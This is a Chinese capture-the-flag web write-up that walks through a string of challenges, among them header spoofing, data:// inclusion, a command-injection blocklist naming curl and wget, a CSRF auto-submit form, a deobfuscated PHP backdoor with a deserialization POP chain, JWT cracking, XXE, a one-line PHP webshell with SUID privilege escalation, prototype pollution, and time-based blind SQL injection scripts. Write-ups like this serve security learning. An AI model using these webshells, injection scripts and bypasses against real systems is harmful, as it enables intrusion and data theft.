登录试试
爆破会不会啊爆破,不写过程了,真的很基础
来发个包
看到了js吗,这边意思就是向/flag.phppost传参一个ifffflag
Can Can Need
弱智一样的请求头伪造
用clinet-ip:127.0.0.1
然后referer:sycsec.com
user-agent:Syclover Browser
L0veSyc
梦开始的地方,看源码
justphp
起步咯
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| <?php
error_reporting(0);
include_once ("flag.php");
highlight_file(__FILE__);
$sleeptime=$_GET['SleepTime'];
if(isset($sleeptime))
{
if(!is_numeric($sleeptime))
{
echo '时间是一个数字啊喂!';
}
else if($sleeptime < 86400 * 30)
{
echo '这点时间哪够Canzik学长睡啊';
}
else if($sleeptime > 86400 * 60)
{
echo '别让Canzik学长睡死在这啊!';
}
else
{
echo '<br/>Canzik学长很满足,表示这次把这辈子的觉都睡完啦!flag在这,自己拿吧:<br/>';
sleep((int)$sleeptime);
echo $flag;
}
}
?>
|
这里就是一个小知识
在PHP版本为5.6左右时:
这是一个小漏洞,intval函数也有这个特性
?SleepTime=3e6
jsfind
js题什么的,感觉的去死吧!
虽然不是很难,但是呢,需要你的经验之谈,也是挺有趣的吼
这个hint好像是之后给的,刚开始做的时候就发现了这个:
这边有个js的load.js,一看就知道是加载js文件的
进去之后有个base64解密之后为:
放到控制台输入一波:
这个应该是前端的某种加密,搜一下很多
ezR_F_I
简单的data协议:
可以看到有个file,我们随便传点
会自动给我们加个html后缀,猜测语句为include(xxx.html),那就好说了,直接data协议去解:
RCE了
结束
ezrce
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
highlight_file(__FILE__);
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
if(preg_match("/ls|tee|head|wegt|nl|vi|vim|file|sh|dir|cat|more|less|tar|mv|cp|wegt|php|sort|echo|bash|curl|uniq|rev|\"|\'| |\/|<|>|\\|/i", $ip,$match)) {
die("hacker!");
} else{
system("ping -c 3 $ip");
}
}
?>
|
WelcomeSQL
宝宝级别的SQL:
union注入,payload自己去写
babyupload
PHP文件都直接提交了,正好试试我的大木马!
这种feel很爽
drinktea
三点给嘞!饮茶先啊!考点就是CSRF
进入靶场后先登录
我们的目标很明确就是这个他妈的尊贵的vip
赤裸裸的告诉你了,我们就在VPS搭建一个恶意文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<script>
window.onload=function(){
document.getElementById("postsubmit").click();
}
</script>
<body>
<form method="post" action="http://mc.vveelin.com.cn:8102/trans.php">
<input id="u" type="text" name="username" value="kino">
<input id="m" type="text" name="money" value="999999999999">
<input id="postsubmit" type="submit" name="" value="">
</form>
</body>
</html>
|
这个意思就是打钱!
在反馈界面可以看到个伪随机数,不难的,直接用php_mt_seed去撞开,最后可以发现种子为666666,然后本地复现一下:
1
2
3
4
5
6
7
8
9
10
11
| mt_srand(666666);
$a=mt_rand();
echo $a;
echo '<br>';
mt_rand();
mt_rand();
mt_rand();
mt_rand();
mt_rand();
echo md5(mt_rand());
?>
|
到账了到账了,最后就差个vip了:
看得出来是给人开VIP的,一样的:
我是贵宾了:
easyphp
空白一片,但是有backup:
发现是index.php.bak:
1
2
3
4
| <?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("JE8wTzAwMD0ianlIcUlZZHJNdVZ4a05RVWdlV2xidGFaUFJFRm9LSkNuQmh3RFhwQU9tZkdTaXZzY1RMenp3Y1h5a0VDbXNxTGdoUk5NWkpRYUd2ZldvRlVuU3RBeGpkVmlySXBiVHVPUEJEWWxlS0hXaTlWdmNwU2syTGRsM21NUlRRWWFjUXlmcnR3dko1eEVPOXNBeFlTeUFwTXlBcE15QWpWRUp0WXZKbU10T0Y3QU1uTXlBcE15QXBNeWNqMWtUTElrd2pURUo1ekVPUURhQmp1cjNFZHYycTFsQU1JQUJwTXlBcE15QXBNWlZuTXlBcE15QXBNeUFwTXlBcE15QXBNdGNvbnZybU1LZTRNa1BwOXlBdFRaY2RDeWNRREVQcEJiVm5NeUFwTXlBcE15YzBTQUJwTXlBcE15QXBNbGNxQmFPUXp5T2YxYVRoMHZKOXN5VTl1Zk9xSEVjdDFrM1JuU1JuTXlBcE15QXBNeWNZU3lBcE15QXBNeUFwTXlBcE15QXBNeU9xenZPOE10Y29udnJtTUtlNE1rUDRCcTI5M3l6WVN5QXBNeUFwTXlBajlBeDBTQVRoWWtyaEh5RnRkYTJFWWtKbzVaVm5NeUFwTXlBcE15Y2oxa1RMSWt3cGdrellTeUFwTXlBcE15QWpWRUp0WXZKbU10T203QU1uTXlBcE15QXBNeWNqMWtUTElrd2pURUo1ekVPUURhQmp1cjNvRE4zb3d2SjV4U0FnU3lBcE15QXBNeUFqN0FCcE15QXBNeUFwTXlBcE15QXBNeUFwZ0VPZElsd3BHV0JqQnlBMCt5T2RkbGNqNVNBbzB2T1FIeUEwK3lPbUliVm5NeUFwTXlBcE15YzBTdVJuU2syTGRsM21NcVRVc29PVXd2MmREYU8xUVpWbk15QXBNeUFwTXljajFrVExJa3dwZ2ZpWVNBQnBNeUFwTXlBcE1sY3FCYU9RenlPZjFhVGgwdko5c3lPZGRsY2o1U0FvemFKUklaVm5NeUFwTXlBcE15QXBNeUFwTXlBcE1mcmZkYUFNZ2syMWdTZVlTeUFwTXlBcE15QWo5QXgwU0FUUVRTT1FIbDJxMFNBb3VORjllcVVZeGwzb3d0MTBJU3JZU3lBcE15QXBNeUFqMWF4aFFsVFFkYU9RNmZQTWdyMWpXTjFvYXQzaDBsQkVFU2VZU3VSbj0iOyAgCiAgICAgICAgZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwgICAgCiAgICAgICAgJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7"));?>
|
发现了一大串什么不得了的东西:
中间eval内的base64解密下来是:
1
2
3
| $O0O000="jyHqIYdrMuVxkNQUgeWlbtaZPREFoKJCnBhwDXpAOmfGSivscTLzzwcXykECmsqLghRNMZJQaGvfWoFUnStAxjdVirIpbTuOPBDYleKHWi9VvcpSk2Ldl3mMRTQYacQyfrtwvJ5xEO9sAxYSyApMyApMyAjVEJtYvJmMtOF7AMnMyApMyApMycj1kTLIkwjTEJ5zEOQDaBjur3Edv2q1lAMIABpMyApMyApMZVnMyApMyApMyApMyApMyApMtconvrmMKe4MkPp9yAtTZcdCycQDEPpBbVnMyApMyApMyc0SABpMyApMyApMlcqBaOQzyOf1aTh0vJ9syU9ufOqHEct1k3RnSRnMyApMyApMycYSyApMyApMyApMyApMyApMyOqzvO8MtconvrmMKe4MkP4Bq293yzYSyApMyApMyAj9Ax0SAThYkrhHyFtda2EYkJo5ZVnMyApMyApMycj1kTLIkwpgkzYSyApMyApMyAjVEJtYvJmMtOm7AMnMyApMyApMycj1kTLIkwjTEJ5zEOQDaBjur3oDN3owvJ5xSAgSyApMyApMyAj7ABpMyApMyApMyApMyApMyApgEOdIlwpGWBjByA0+yOddlcj5SAo0vOQHyA0+yOmIbVnMyApMyApMyc0SuRnSk2Ldl3mMqTUsoOUwv2dDaO1QZVnMyApMyApMycj1kTLIkwpgfiYSABpMyApMyApMlcqBaOQzyOf1aTh0vJ9syOddlcj5SAozaJRIZVnMyApMyApMyApMyApMyApMfrfdaAMgk21gSeYSyApMyApMyAj9Ax0SATQTSOQHl2q0SAouNF9eqUYxl3owt10ISrYSyApMyApMyAj1axhQlTQdaOQ6fPMgr1jWN1oat3h0lBEESeYSuRn=";
eval('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),
$OO0O00($O0O000,0,$OO0000))));
|
重要的东西是:
1
2
| $O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),
$OO0O00($O0O000,0,$OO0000)))
|
这一串byd的东西,我们本地调试看看这一串是什么:
1
2
3
4
5
6
7
8
9
10
11
| $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
var_dump($O00O0O);var_dump($OO0O00);var_dump($OO0000);var_dump($O0OO00);
eval($O00O0O("JE8wTzAwMD0ianlIcUlZZHJNdVZ4a05RVWdlV2xidGFaUFJFRm9LSkNuQmh3RFhwQU9tZkdTaXZzY1RMenp3Y1h5a0VDbXNxTGdoUk5NWkpRYUd2ZldvRlVuU3RBeGpkVmlySXBiVHVPUEJEWWxlS0hXaTlWdmNwU2syTGRsM21NUlRRWWFjUXlmcnR3dko1eEVPOXNBeFlTeUFwTXlBcE15QWpWRUp0WXZKbU10T0Y3QU1uTXlBcE15QXBNeWNqMWtUTElrd2pURUo1ekVPUURhQmp1cjNFZHYycTFsQU1JQUJwTXlBcE15QXBNWlZuTXlBcE15QXBNeUFwTXlBcE15QXBNdGNvbnZybU1LZTRNa1BwOXlBdFRaY2RDeWNRREVQcEJiVm5NeUFwTXlBcE15YzBTQUJwTXlBcE15QXBNbGNxQmFPUXp5T2YxYVRoMHZKOXN5VTl1Zk9xSEVjdDFrM1JuU1JuTXlBcE15QXBNeWNZU3lBcE15QXBNeUFwTXlBcE15QXBNeU9xenZPOE10Y29udnJtTUtlNE1rUDRCcTI5M3l6WVN5QXBNeUFwTXlBajlBeDBTQVRoWWtyaEh5RnRkYTJFWWtKbzVaVm5NeUFwTXlBcE15Y2oxa1RMSWt3cGdrellTeUFwTXlBcE15QWpWRUp0WXZKbU10T203QU1uTXlBcE15QXBNeWNqMWtUTElrd2pURUo1ekVPUURhQmp1cjNvRE4zb3d2SjV4U0FnU3lBcE15QXBNeUFqN0FCcE15QXBNeUFwTXlBcE15QXBNeUFwZ0VPZElsd3BHV0JqQnlBMCt5T2RkbGNqNVNBbzB2T1FIeUEwK3lPbUliVm5NeUFwTXlBcE15YzBTdVJuU2syTGRsM21NcVRVc29PVXd2MmREYU8xUVpWbk15QXBNeUFwTXljajFrVExJa3dwZ2ZpWVNBQnBNeUFwTXlBcE1sY3FCYU9RenlPZjFhVGgwdko5c3lPZGRsY2o1U0FvemFKUklaVm5NeUFwTXlBcE15QXBNeUFwTXlBcE1mcmZkYUFNZ2syMWdTZVlTeUFwTXlBcE15QWo5QXgwU0FUUVRTT1FIbDJxMFNBb3VORjllcVVZeGwzb3d0MTBJU3JZU3lBcE15QXBNeUFqMWF4aFFsVFFkYU9RNmZQTWdyMWpXTjFvYXQzaDBsQkVFU2VZU3VSbj0iOyAgCiAgICAgICAgZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwgICAgCiAgICAgICAgJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7"));
$O0O000="jyHqIYdrMuVxkNQUgeWlbtaZPREFoKJCnBhwDXpAOmfGSivscTLzzwcXykECmsqLghRNMZJQaGvfWoFUnStAxjdVirIpbTuOPBDYleKHWi9VvcpSk2Ldl3mMRTQYacQyfrtwvJ5xEO9sAxYSyApMyApMyAjVEJtYvJmMtOF7AMnMyApMyApMycj1kTLIkwjTEJ5zEOQDaBjur3Edv2q1lAMIABpMyApMyApMZVnMyApMyApMyApMyApMyApMtconvrmMKe4MkPp9yAtTZcdCycQDEPpBbVnMyApMyApMyc0SABpMyApMyApMlcqBaOQzyOf1aTh0vJ9syU9ufOqHEct1k3RnSRnMyApMyApMycYSyApMyApMyApMyApMyApMyOqzvO8MtconvrmMKe4MkP4Bq293yzYSyApMyApMyAj9Ax0SAThYkrhHyFtda2EYkJo5ZVnMyApMyApMycj1kTLIkwpgkzYSyApMyApMyAjVEJtYvJmMtOm7AMnMyApMyApMycj1kTLIkwjTEJ5zEOQDaBjur3oDN3owvJ5xSAgSyApMyApMyAj7ABpMyApMyApMyApMyApMyApgEOdIlwpGWBjByA0+yOddlcj5SAo0vOQHyA0+yOmIbVnMyApMyApMyc0SuRnSk2Ldl3mMqTUsoOUwv2dDaO1QZVnMyApMyApMycj1kTLIkwpgfiYSABpMyApMyApMlcqBaOQzyOf1aTh0vJ9syOddlcj5SAozaJRIZVnMyApMyApMyApMyApMyApMfrfdaAMgk21gSeYSyApMyApMyAj9Ax0SATQTSOQHl2q0SAouNF9eqUYxl3owt10ISrYSyApMyApMyAj1axhQlTQdaOQ6fPMgr1jWN1oat3h0lBEESeYSuRn=";
echo '<br>';
var_dump($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),
$OO0O00($O0O000,0,$OO0000)));
?>
|
得到了一串base64:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| <?php
class BillyHerrington
{
public $a;
public function __wakeup()
{
$this -> a = "fxxk you ";
}
public function __destruct()
{
echo $this -> a."Wow";
}
}
class Baoglady{
public $b;
public $c;
public function __toString()
{
$this -> b -> happy($this -> c);
}
}
class VanDarkholme{
public $d;
public function happy($cmd){
eval($cmd);
}
}
if(isset($_POST['str'])){
unserialize($_POST['str']);
}
|
什么?解出来居然是一个反序列化的,纳尼?你喜欢套娃是吗
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| <?php
class BillyHerrington
{
public $a;
public function __construct(){
$this->a=new Baoglady();
}
}
class Baoglady{
public $b;
public $c='eva($_POST[1]);';
public function __construct(){
$this->b=new VanDarkholme();
}
}
class VanDarkholme{
public $d;
public function happy($cmd){
eval($cmd);
}
}
$a=new BillyHerrington();
echo serialize($a);
?>
|
POP链就是如上所示了,逻辑浅显易懂无脑
记得改一下属性绕过wakeup,就这样rce了,我有啥好说的
easygame
考点:JWT,XXE
跟着他的指引一路走好:
这个一眼就知道是JWT,拖进JWT.IO分析一下:
浅显易懂,不过注意一下时间戳,这就是我们的deadline了,要不然提交会过期
然后现在要做的就是根据题目给的字典来爆破一下jwt是什么,写个py脚本:
你不开始攻击他我可就要开始攻击你了
家人们跑脚本的时候对一下时间戳,否则就无了
哦欧克,解密一下:
我觉得吧,这个一眼就是XXE注入:
这里唯一需要注意的就是application/xml格式注意
edit_php
这一题就比较坑爹了,因为他源码藏的方式很肮脏
创建相册后就到这里了,然后期间有个跳转过程,是从CatchImg.php跳转到showimage.php,然后如果你在CatchImg界面不传参的话就会显示白盒代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| <?php
if(!isset($_COOKIE['path'])){
header("Location: /index.php");
exit();
}else{
$path = $_COOKIE['path'];
if(!is_dir('upload/'.$path)){
mkdir('upload/'.$path);
chmod('upload/'.$path,0755);
}
function waf($str){
$uri = parse_url($str, 5);
$checklist = ['gif','jpg','png'];
$ext = substr($uri,strpos($uri,".")+1);
if(in_array($ext,$checklist)){
return $uri;
}
return "";
}
if(isset($_GET['file_url'])){
$contents = file_get_contents($_GET['file_url']);
$ext = substr($_GET['file_url'], strrpos($_GET['file_url'], ".") + 1);
$uri = waf($_GET['file_url']);
if($uri !== ""){
$file_name = substr($uri,''==strpos($uri,'/')?0:1,strpos($uri,'.')-(''==strpos($uri,'/')?0:1));
file_put_contents('upload/'.$path.'/'.md5($file_name).'.'.$ext,$contents);
}
} else {
echo "no resource!";
header("Location: /index.php");
show_source(__FILE__);
exit();
}
}
header("refresh: 0;url=/showImage.php");
echo "success";
?>
|
我们审计一下就能发现,它存在一个waf以及一个读写过程
- parse_url:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| <?php
$url = 'http://username:password@hostname:9090/path?arg=value#anchor';
var_dump(parse_url($url));
var_dump(parse_url($url, PHP_URL_SCHEME));
var_dump(parse_url($url, PHP_URL_USER));
var_dump(parse_url($url, PHP_URL_PASS));
var_dump(parse_url($url, PHP_URL_HOST));
var_dump(parse_url($url, PHP_URL_PORT));
var_dump(parse_url($url, PHP_URL_PATH));
var_dump(parse_url($url, PHP_URL_QUERY));
var_dump(parse_url($url, PHP_URL_FRAGMENT));
?>
-----------------------------
<!-- array(8) {
["scheme"]=>
string(4) "http"
["host"]=>
string(8) "hostname"
["port"]=>
int(9090)
["user"]=>
string(8) "username"
["pass"]=>
string(8) "password"
["path"]=>
string(5) "/path"
["query"]=>
string(9) "arg=value"
["fragment"]=>
string(6) "anchor"
}
string(4) "http"
string(8) "username"
string(8) "password"
string(8) "hostname"
int(9090)
string(5) "/path"
string(9) "arg=value"
string(6) "anchor" -->
|
之后就用substr和strpos去截取后缀名,这个截取的是第一个后缀名,必须在白名单内
然后我们还要注意到strpos和strrpos,一开始没看到这个懵逼了,这2个前者是截取第一次出现,后者是截取最后一次出现的位置
然后在我们传入了之后
首先获取传入的文件的信息,这里可以用data写自定义内容
然后用strrpos获取最后的后缀名,这也就是个漏洞
我们payloaddata://text/plain,1.png?<?php eval($_POST[1]);?>.php就会把我们的木马写入$file_name里,$file_name是什么呢,我们不妨试一试:
可以看到第一个waf我们是过了的,然后ext肯定也会被截取为php,filename就是/plain,1我们md5加密一下5e0cae35ba330954ea34a6746bae3b9e
所以最后会被放到:/upload/13ef570a-d8fc-0c3b-2ffd-0f955e25c25b/5e0cae35ba330954ea34a6746bae3b9e.php中,内容就是我们写的一句话木马:
然后蚁剑上号,这里需要一个简单的提权:
首先先看看有s权限的有哪些find / -perm -u=s -type f 2>/dev/null:
这边看到more有权限,那就直接用了
cointowin
考点:原型链污染
进去界面叫我们注册然后登入,启示给我们100-200元,但是flag要10000元
获取钱的方式给了一个,就是去赌博,赌狗的下场是什么不用我说了吧
在导出界面看到了一些json格式的数据,盲猜一波原型链污染:
在导入界面可以导入我们的json代码:
{"user":"kino","coin":101,"hashcode":"c26522e2ec46bf2936678d4ee81d548a","__proto__":{"coin":100000000}}
如下添加一个原型去污染:
然后我们再注册一个号登入:
钱到手咯,去买flag咯:
Not_Stay
注意url加一个/进入题目入口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| include_once('waf.php');
function uuid()
{
$chars = md5(uniqid(mt_rand(), true));
$uuid = substr ( $chars, 0, 8 ) . '-'
. substr ( $chars, 8, 4 ) . '-'
. substr ( $chars, 12, 4 ) . '-'
. substr ( $chars, 16, 4 ) . '-'
. substr ( $chars, 20, 12 );
return $uuid ;
}
$safe_header = '<?php exit();?>';
if(!isset($_COOKIE['path'])){
setcookie('path',uuid());
exit();
}
$path = './upload/'.$_COOKIE['path'].'/';
if(!is_dir($path)){
mkdir($path);
chmod($path,0755);
}
$file_data = $_POST['data'];
$filename = $_POST['filename'];
if(isset($_POST['data'])){
file_put_contents('/tmp/'.$_COOKIE['path'],$file_data);
$file_type = exif_imagetype('/tmp/'.$_COOKIE['path']);
if($file_type != "GIF" && $file_type != "PNG"){
die('nonono');
}
}else{
echo "I need data";
}
if(isset($_POST['filename'])){
file_put_contents($filename,$safe_header.$file_data);
} else {
echo "I need name";
}
show_source(__FILE__);
?>
|
不难理解他的意思,我们要post一个data,同时post一个filename,data要实现文件头检测,然后加入了一个死亡代码,直接尝试用filter的convert.base64-decode去绕过,payload:
data=GIF89aaaaaaaaPD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg===&filename=php://filter/write=convert.base64-decode/resource=upload/bf380593-7548-5811-3640-b9cc1f03c483/1.php:
RCE了之后我就不想多bb了,flag在根目录
ezrequset
你只需要简单的编写一个脚本即可
一看就知道是要用脚本光速抢课:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| import requests
url1="http://e69f96c6-6765-11ed-bc58-165319f5738e.challenge.sycsec.com/?action=index"
url2="http://e69f96c6-6765-11ed-bc58-165319f5738e.challenge.sycsec.com/?action=check"
data1={
"xh":'211'
}
data2={
"num":"8",
"class":"台球"
}
while True:
r1=requests.post(url=url1,data=data1)
cookies=r1.cookies
r2=requests.post(url=url2,data=data2,cookies=cookies)
print(r2.text)
if "抢到了!" in r2.text:
print(r2.headers)
print(r2.cookies)
print(r2.text)
|
Loginintomyheart
这题总体还是需要点信息收集和反序列化的基础
不管你怎么登陆都是失败,只有知道用户Vanzy的密码才可以:
O:3:"Log":3:{s:8:"password";s:32:"21232f297a57a5a743894a0e4a801fc3";s:8:"username";s:5:"hacker";s:7:"islogin";i:0;}
我们前面用的是admin/admin,可是用户名被替换成了hacker,hacker六个字母,admin五个字母,然后islogin是判断是否登录的,不用想肯定是反序列化字符逃逸,让islogin变成1,利用admin和hacker的字差构造payload:
O:3:"Log":3:{s:8:"password";s:32:"21232f297a57a5a743894a0e4a801fc3";s:8:"username";s:26:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:7:"islogin";i:1;}";s:7:"islogin";i:0;}
上面的东西是我们理想的预计要构造的payload,从s:26开始构造,admin";s:7:"islogin";i:1;}是26个字母,但是输入之后实际长度就是admin,然后替换为hacker之后就多一个长度,中间差了21长度,所以要输入21个admin来弥补:
adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:7:"islogin";i:1;}
这就是我们最终的payload:
输入到username里
嗯
uploadrce
找一下swp文件,找了一下发现是
第一个是config.php的备份,第二个是index的
如何查看swp文件呢,这就用一下linux的vim -r file命令,自动修复
可以发现这里是有一个addslahes函数去转义的,我们可以在本地runrun试一试:
假如如上payload会发生什么事情呢?首先a%00会被addslashes函数转义为a\0,而这个\0又有讲究了,这个东西说的是第一次被匹配到的东西,也就是原本的$option='a',所以最后的结果如上,然后这边溢出的字符就是a了,也就是这个a就是我们的注入点:
从这边可以看出我们的一句话木马是已经写上去了的,这就是我们的payload了:(上面的知识测试不是payload)
;eval($_POST[1]);?>%00,运行两次,第一次是让他变成option的值,第二次让他溢出:
成功rce:
easysql
题目提示看robots:
看到了select语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
import requests
import time
url='http://uc9dd651-5fd5-11ed-ac9d-5aa08d24e2a5.challenge.sycsec.com/login.php'
result=''
i=0
while True:
i+=1
for j in range(33,128):
if chr(j)!='%' and chr(j)!='$' and chr(j)!='&':
data={
"username":"vanzy",
"secretpass":f"1'or/**/if(mid((select/**/secretpass/**/from/**/vanzy_secret),1,{i})/**/like/**/'{result+chr(j)}',sleep(1),1)#",
}
t1=time.time()
r=requests.post(url,data=data)
t2=time.time()
print(t2-t1)
if t2-t1>1:
result+=chr(j)
print(result)
break
|
结果测试发现就是一个有一丢丢过滤的sql注入,不太难,写个脚本就出来了,但是我这边跑的全是大写,所以会有些bug,我也不知道为什么他大小不敏感,最后转成小写字母就是van2y0secret0qaq:
babysql
这道题就是我的噩梦啊,我以为我会写
考点时Postgresql注入,语法啥的自己搜搜就会了
1 union select null,null,null --发现有回显,就说明是PSQL注入了,你可以通过这个结合网上的资料,注出很多东西,最后你也会发现他说flag在root目录下
也就是现在如何去读取root目录是个问题,我卡在这一步没出来!
noobsql
这题也没出来,他这题我知道注入点在哪儿:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| import requests
import time
url1="http://e6851b0f-668a-11ed-bc58-165319f5738e.challenge.sycsec.com/?action=reg"
url2="http://e6851b0f-668a-11ed-bc58-165319f5738e.challenge.sycsec.com/?action=login"
i=0
result=''
while True:
i = i + 1
head = 32
tail = 127
while head<tail:
mid = (head + tail) >> 1
data1={
"username":f"a'or elt(mid((select group_concat(schema_name) from information_schema.schemata),{i},2)>'{chr(mid)}',sleep(0.003))#",
"password":"1",
}
print(data1["username"],data1["password"])
data2 = {
"username":f"a'or elt(mid((select group_concat(schema_name) from information_schema.schemata),{i},2)>'{chr(mid)}',sleep(0.003))#",
"password": "1",
}
r1=requests.post(url=url1,data=data1)
t1=time.time()
r2 = requests.post(url=url2, data=data2)
t2=time.time()
print(t2-t1)
if t2-t1>1:
head = mid + 1
else:
tail = mid
if head != 32:
print(head)
result += chr(head)
print(result)
else:
break
|
脚本就是这样,有长度限制,所以很掐手,但是你注出的东西是下面的一坨屎:
第一个ctfchinfo是当前表,第二个是列名,第三个是group_concat(schema_name)的值,你觉得有规律吗,一点hint也没,无语!
rceus
我一眼就知道又是考什么新的rce:
代码就这么一点,你怎么去bypass呢?
猜测和断言有关?有毒